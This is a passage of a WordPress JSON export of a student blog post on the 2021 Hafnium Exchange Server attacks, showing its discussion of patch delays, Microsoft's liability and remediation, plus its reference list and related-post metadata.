<\/em>[R9]<\/figcaption><\/figure>\n\n\n\n<p>Because there are a lot of Exchange Servers running out there that were patched in March 2021, they are not completly secure, because it wasn\u2019t until April 2021 that the vulnerabilities were silently patched again. Anyone who administers an Exchange Server should bring it always up to the latest security patch level and also prevent it from being accessible via the Internet.<\/p>\n\n\n\n<p>In addition to these protective measures, Microsoft also informed the responsible US government agencies about the activities of Hafnium. This is the eighth time in the last 12 months that Microsoft has exposed the attacks by national hacker groups on civil society institutions.<\/p>\n\n\n\n<p>See [R6]<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">LEARNINGS<\/h2>\n\n\n\n<p>To the best of recent knowledge, some of the security vulnerabilities have been known for a long time. In addition, Microsoft\u2019s warning management is unsuccessful in this case. Zero-day exploits can always occur and Exchange Servers that have been used unpatched for years are more critical. Some of the gaps from the beginning of 2020 have not even been closed yet by updates. One can quickly become overwhelmed with maintaining Microsoft Exchange. A solution could be for such companies to switch to a cloud solution, to get an IT service provider or to change the product.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">DISCUSSION<\/h2>\n\n\n\n<p>Despite several warnings, patches and available resources, victims of the Exchange Server attack might not be relieved from consequences for an extended time. It is up to the affected organizations to identify the extend of compromise and realize that the applied patches might not be a long term solution. Those patches were released a considerable time after the vulnerabilities on the servers have been exploited. The minute the updates were applied there is still a chance the system has been compromised.<\/p>\n\n\n\n<p>Additionally it is questionable if the proposals from Microsoft to prevent further attacks are actually helpful and working. Why is the server unstable against the attacks? Why is the server not resilient? Why is it not known what is affected after the attack? Why doesn&#8217;t a program have metadata about the permissions it needs? It appears that Microsoft always tries to butter up their clients yet they haven&#8217;t improved their foundational issues in recent years.<\/p>\n\n\n\n<p>Additionally, many companies might have still been working on the response to the Solar Winds compromise to where teams now being hit with potentially responding to Exchange attacks might be overwhelmed.<br>Rubbing even further salt in the wound, patching and remediation could become exponentially more problematic now that other groups are also piling on to the vulnerabilities first exploited by Hafnium. Especially since most organizations don&#8217;t have the capability or lack forensic knowledge to get in there and figure out what the attackers did with the backdoor.<\/p>\n\n\n\n<p>While hackers continuously grow in sophistication and impact, especially with state-sponsored attackers like Hafnium, it is simply not realistic anymore to assume that all attacks can be prevented. Therefore organizations need to increase their foundational cybersecurity capabilities with modern, comprehensive threat detection and response tools to detect attacks in early stages. Such predictive actions cans serve the right means to shut attackers down before they can do real harm.<br>Also the current vulnerabilities in exchange might want to bee seen as only the tip of iceberg. Many future attacks may be upcoming. As an example, while a security group was investigating the exchange architecture, involving server-side, client-side and crypto vulnerabilities that can be exploited through various attack chains eight vulnerabilities were already discovered at once [R12].<\/p>\n\n\n\n<p>Many questions therefore arise: Could Microsoft can be held liable here for their actions. Did they take the loophole seriously (enough)?<br>Most of the time such cases are though documented in the license. One is not liable for any damage and does not guarantee the safety or functionality of the product.<br>For a company with a market share like Microsoft their actions were yet rather negligent. Almost two months for a patch of a remote code execution vulnerability in a product that is one of the most relevant components in many companies is a long time. Even after Microsoft received hints from several sides that such a vulnerability was apparently being actively exploited, it still took over a month to the patch. Sure, a patch like this can&#8217;t be released within a day, but that amount of time it took them is ridiculous.<br>It is quite interesting how Microsoft will continue to be the market leader and their mistakes don\u2019t seem to matter.<\/p>\n\n\n\n<p>It seems strange that the world is talking about huge damage and dangers with mail, but mail end-to-end encryption  is still a marginal phenomenon. Yet it could also be used to combat spam very well and the mail servers would no longer be so attractive as a target.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7.png\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" data-attachment-id=\"20861\" data-permalink=\"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/30\/hafnium-exchange-server-attacks-what-happened-and-how-to-protect-yourself\/7-3\/\" data-orig-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7.png\" data-orig-size=\"1067,600\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"7\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7-1024x576.png\" src=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7-1024x576.png\" alt=\"\" class=\"wp-image-20861\" srcset=\"https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7-1024x576.png 1024w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7-300x169.png 300w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7-768x432.png 768w, https:\/\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2021\/08\/7.png 1067w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Image source <\/em>[R14]<\/figcaption><\/figure>\n\n\n\n<p>According to the german President of the Federal Office for Information Security Arne Sch\u00f6nbohm, many of the german vulnerable exchange servers were already patched in the first few weeks of the discovery of the attack. That shows us that a rapid response is possible even in Germany, but there is always room for improvement.<\/p>\n\n\n\n<!--nextpage-->\n\n\n\n<p>RESOURCES<\/p>\n\n\n\n<p>[R1] https:\/\/www.heise.de\/news\/Der-Hafnium-Exchange-Server-Hack-Anatomie-einer-Katastrophe-5077269.html<\/p>\n\n\n\n<p>[R2] https:\/\/www.bsi.bund.de\/SharedDocs\/Cybersicherheitswarnungen\/DE\/2021\/2021-197772-1132.pdf?__blob=publicationFile&amp;v=21<\/p>\n\n\n\n<p>[R3] https:\/\/www.microsoft.com\/security\/blog\/2021\/03\/02\/hafnium-targeting-exchange-servers\/<\/p>\n\n\n\n<p>[R4] https:\/\/www.bsi.bund.de\/SharedDocs\/Downloads\/DE\/BSI\/Cyber-Sicherheit\/Vorfaelle\/Exchange-Schwachstellen-2021\/MSExchange_Schwachstelle_Detektion_Reaktion.pdf?__blob=publicationFile&amp;v=3<\/p>\n\n\n\n<p>[R5] https:\/\/www.boc.de\/watchguard-info-portal\/2021\/03\/exchange-server-hafnium-exploit\/<\/p>\n\n\n\n<p>[R6] <a href=\"https:\/\/niedersachsen.digital\/hafnium-hack-ablauf-und-folgen\/\">https:\/\/niedersachsen.digital\/hafnium-hack-ablauf-und-folgen\/<\/a><\/p>\n\n\n\n<p>[R7] <a href=\"https:\/\/techsearch.watchguard.com\/KB?type=Security%20Issues&amp;SFDCID=kA10H000000Xe1SSAS&amp;lang=en_US\">https:\/\/techsearch.watchguard.com\/KB?type=Security%20Issues&amp;SFDCID=kA10H000000Xe1SSAS&amp;lang=en_US<\/a><\/p>\n\n\n\n<p>[R8] <a href=\"https:\/\/techcommunity.microsoft.com\/t5\/exchange-team-blog\/released-march-2021-exchange-server-security-updates\/ba-p\/2175901\">https:\/\/techcommunity.microsoft.com\/t5\/exchange-team-blog\/released-march-2021-exchange-server-security-updates\/ba-p\/2175901<\/a><\/p>\n\n\n\n<p>[R9] <a href=\"https:\/\/msrc-blog.microsoft.com\/2021\/03\/15\/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021\/\">https:\/\/msrc-blog.microsoft.com\/2021\/03\/15\/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021\/<\/a><\/p>\n\n\n\n<p>[R10] <a href=\"https:\/\/www.boc.de\/watchguard-info-portal\/2021\/03\/exchange-server-hafnium-exploit\/\">https:\/\/www.boc.de\/watchguard-info-portal\/2021\/03\/exchange-server-hafnium-exploit\/<\/a><\/p>\n\n\n\n<p>[R11]https:\/\/krebsonsecurity.com\/2021\/03\/a-basic-timeline-of-the-exchange-mass-hack\/<\/p>\n\n\n\n<p>[R12]https:\/\/www.csoonline.com\/article\/3616699\/the-microsoft-exchange-server-hack-a-timeline.html<\/p>\n\n\n\n<p>[R13] <a href=\"https:\/\/i.blackhat.com\/USA21\/Wednesday-Handouts\/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf?fbclid=IwAR1OjjeekAedgBE-URvEYw28BJv27PMffATZkFzeaO8BgZyqBSN6O9vE5b8\">https:\/\/i.blackhat.com\/USA21\/Wednesday-Handouts\/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf?fbclid=IwAR1OjjeekAedgBE-URvEYw28BJv27PMffATZkFzeaO8BgZyqBSN6O9vE5b8<\/a><\/p>\n\n\n\n<p>[R13] <a href=\"https:\/\/www.rapid7.com\/blog\/post\/2021\/03\/03\/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day\/\">https:\/\/www.rapid7.com\/blog\/post\/2021\/03\/03\/rapid7s-insightidr-enables-detection-and-response-to-microsoft-exchange-0-day\/<\/a><\/p>\n\n\n\n<p>[R14] <a href=\"https:\/\/twitter.com\/ArneSchoenbohm\/status\/1372203599657336836\">https:\/\/twitter.com\/ArneSchoenbohm\/status\/1372203599657336836<\/a><\/p>\n\n\n\n<p>[R15] https:\/\/www.netwitness.com\/en-us\/blog\/2021-03\/hafnium-attacks-microsoft-exchange-users<\/p>\n\n\n\n<p>[R16] <a href=\"https:\/\/i.blackhat.com\/USA21\/Wednesday-Handouts\/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf?fbclid=IwAR1OjjeekAedgBE-URvEYw28BJv27PMffATZkFzeaO8BgZyqBSN6O9vE5b8\" rel=\"noreferrer noopener\" target=\"_blank\">https:\/\/i.blackhat.com\/USA21\/Wednesday-Handouts\/us-21-ProxyLogon-Is-Just-The-Tip-Of-The-Iceberg-A-New-Attack-Surface-On-Microsoft-Exchange-Server.pdf?fbclid=IwAR1OjjeekAedgBE-URvEYw28BJv27PMffATZkFzeaO8BgZyqBSN6O9vE5b8<\/a><\/p>\n\n\n\n<p>[R17] <a href=\"https:\/\/unit42.paloaltonetworks.com\/microsoft-exchange-server-attack-timeline\/\" rel=\"noreferrer noopener\" target=\"_blank\">https:\/\/unit42.paloaltonetworks.com\/microsoft-exchange-server-attack-timeline\/<\/a><\/p>\n\n\n\n<p>[*] The NCC Group has published a GitHub repository in which they provide the hash values of the files in the Exchange installation directories from the installation packages, which can be helpful as a comparison for searching for webshells: https:\/\/github.com\/nccgroup\/Cyber-Defence\/tree\/master\/Intelligence\/Exchange<\/p>\n","protected":false},"excerpt":{"rendered":"<p>an article by Carina Szkudlarek, Niklas Schildhauer and Jannik Smidt This post is going to review the zero day exploit of the Microsoft Exchange Servers starting in January 2021.It will look into the methods of SSRF and the exploitation of mistakes in the deserialization of input values to procure privileged code execution. INTRODUCTION In early [&hellip;]<\/p>\n","protected":false},"author":1043,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[26],"tags":[505,503,35,501,504,502,58,125],"ppma_author":[855],"class_list":["post-20850","post","type-post","status-publish","format-standard","hentry","category-secure-systems","tag-0day","tag-exchange","tag-hack","tag-hafnium","tag-kriha","tag-microsoft","tag-secure-systems","tag-vulnerabilities"],"aioseo_notices":[],"jetpack_featured_media_url":"","jetpack-related-posts":[{"id":3084,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2017\/09\/05\/cloud-security-part-2-the-vulnerabilities-and-threats-of-the-cloud-current-scientific-work-on-cloud-security-conclusion-and-outlook\/","url_meta":{"origin":20850,"position":0},"title":"Cloud Security \u2013 Part 2: The vulnerabilities and threats of the cloud, current scientific work on cloud security, conclusion and outlook","author":"Andreas Fliehr","date":"5. September 2017","format":false,"excerpt":"The second of two blog posts about cloud security. This post covers the vulnerabilities and threats of the cloud, the current scientific work on cloud security and a conclusion and an outlook.","rel":"","context":"In &quot;Cloud Technologies&quot;","block_context":{"text":"Cloud Technologies","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/scalable-systems\/cloud-technologies\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2017\/09\/Structure-of-Nexen.png?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2017\/09\/Structure-of-Nexen.png?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2017\/09\/Structure-of-Nexen.png?resize=525%2C300&ssl=1 1.5x"},"classes":[]},{"id":664,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2016\/06\/24\/web-app-file-upload-vulnerabilities\/","url_meta":{"origin":20850,"position":1},"title":"Web App \u2013 File Upload Vulnerabilities","author":"Thomas Derleth","date":"24. June 2016","format":false,"excerpt":"Today we will discuss file upload vulnerabilities; a topic that is widely underestimated by developers. First, we will imagine a website in which it is possible to upload images with the format .jpg, .png, .gif and so on.\u00a0If an application does not have proper form validation for file uploads, an\u2026","rel":"","context":"In &quot;Interactive Media&quot;","block_context":{"text":"Interactive Media","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/interactive-media\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":23067,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2022\/03\/15\/security-strategies-and-best-practices-for-microservices-architecture\/","url_meta":{"origin":20850,"position":2},"title":"Security Strategies and Best Practices for Microservices Architecture","author":"Larissa Schmauss","date":"15. March 2022","format":false,"excerpt":"Microservices architectures seem to be the new trend in the approach to application development. However, one should always keep in mind that microservices architectures are always closely associated with a specific environment:\u00a0Companies want to develop faster and faster, but resources are also becoming more limited, so they now want to\u2026","rel":"","context":"In &quot;Scalable Systems&quot;","block_context":{"text":"Scalable Systems","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/scalable-systems\/"},"img":{"alt_text":"","src":"https:\/\/lh6.googleusercontent.com\/LbFspPRY1BxRBdAVjQwWXeJ6UOoxl6JWsRYrxboF5ObXlNNgy3uZikcGkc3cgzI0mr_ZlbWPxvdp0FoJC1k-odh7mRc2lCPXaMSq8TudjfoZ7e5HKstaMHmLpH319jCym6vQRo1a","width":350,"height":200,"srcset":"https:\/\/lh6.googleusercontent.com\/LbFspPRY1BxRBdAVjQwWXeJ6UOoxl6JWsRYrxboF5ObXlNNgy3uZikcGkc3cgzI0mr_ZlbWPxvdp0FoJC1k-odh7mRc2lCPXaMSq8TudjfoZ7e5HKstaMHmLpH319jCym6vQRo1a 1x, https:\/\/lh6.googleusercontent.com\/LbFspPRY1BxRBdAVjQwWXeJ6UOoxl6JWsRYrxboF5ObXlNNgy3uZikcGkc3cgzI0mr_ZlbWPxvdp0FoJC1k-odh7mRc2lCPXaMSq8TudjfoZ7e5HKstaMHmLpH319jCym6vQRo1a 1.5x"},"classes":[]},{"id":3864,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2018\/08\/07\/server-less-computing-vs-security\/","url_meta":{"origin":20850,"position":3},"title":"Server \u201cless\u201d Computing vs. Security","author":"Merve Uzun","date":"7. August 2018","format":false,"excerpt":"Summary about Serverless Computing with Security aspects.","rel":"","context":"In &quot;Allgemein&quot;","block_context":{"text":"Allgemein","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/allgemein\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blog.mi.hdm-stuttgart.de\/wp-content\/uploads\/2018\/08\/Funktionsweise-300x98.png?resize=350%2C200&ssl=1","width":350,"height":200},"classes":[]},{"id":20309,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2021\/08\/14\/unsafe-programming-languages\/","url_meta":{"origin":20850,"position":4},"title":"Unsafe Languages, Inadequate Defense Mechanisms and Our Dangerous Addiction to Legacy Code","author":"Jan-Niklas Tille","date":"14. August 2021","format":false,"excerpt":"Over the last 20 years, developing secure software has become increasingly important. To this day, we write a significant amount of code in languages with manual memory management. However, the Peter Parker principle states that \u201cgreat power comes with great responsibility\u201d. Many scoring systems classify, enumerate and rank prevalence of\u2026","rel":"","context":"In &quot;Allgemein&quot;","block_context":{"text":"Allgemein","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/allgemein\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":10939,"url":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/2020\/09\/11\/how-are-vulnerabilities-exploited-to-compromise-a-system\/","url_meta":{"origin":20850,"position":5},"title":"How are vulnerabilities exploited to compromise a system?","author":"Joel Beiter","date":"11. September 2020","format":false,"excerpt":"This article is a recap of the \"Live Hack\" presentation, held in the lecture \"Sichere Systeme\" in SS 2020. It will introduce different vulnerabilities like XSS and SQL-Injection and shows how passwords can be cracked under certain circumstances. The last step explains how a SUID binary was exploited to gain\u2026","rel":"","context":"In &quot;Secure Systems&quot;","block_context":{"text":"Secure Systems","link":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/category\/system-designs\/secure-systems\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]}],"jetpack_sharing_enabled":true,"authors":[{"term_id":855,"user_id":1043,"is_guest":0,"slug":"js444","display_name":"Jannik Smidt","avatar_url":"https:\/\/secure.gravatar.com\/avatar\/4fc0f10d53e9ed0e2510bbcda65170bb2462ed0da81dca543f01ddfb81154c2d?s=96&d=mm&r=g","0":null,"1":"","2":"","3":"","4":"","5":"","6":"","7":"","8":""}],"_links":{"self":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/20850","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/users\/1043"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/comments?post=20850"}],"version-history":[{"count":27,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/20850\/revisions"}],"predecessor-version":[{"id":25356,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/posts\/20850\/revisions\/25356"}],"wp:attachment":[{"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/media?parent=20850"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/categories?post=20850"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/tags?post=20850"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/blog.mi.hdm-stuttgart.de\/index.php\/wp-json\/wp\/v2\/ppma_author?post=20850"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}